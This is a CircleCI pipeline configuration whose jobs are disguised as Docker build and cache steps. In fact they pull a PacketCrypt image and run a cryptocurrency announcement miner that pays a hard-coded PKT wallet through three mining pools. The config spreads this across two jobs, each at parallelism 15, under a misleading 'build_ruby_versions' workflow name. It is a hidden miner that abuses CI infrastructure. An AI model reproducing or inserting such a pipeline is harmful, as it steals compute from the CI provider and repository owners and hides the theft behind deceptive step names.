.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cachescs
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f http://pool.pktpool.io http://pool.pkt.world http://pool.srizbi.com 2>&1 | grep -o "annmine.rs.*Ke.*"
            
version: 2.0

jobs:
  build:
    docker:
      - image: cimg/go:1.17
    steps:
      - checkout
  gas1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas2:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
    
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - gas1
      - gas2
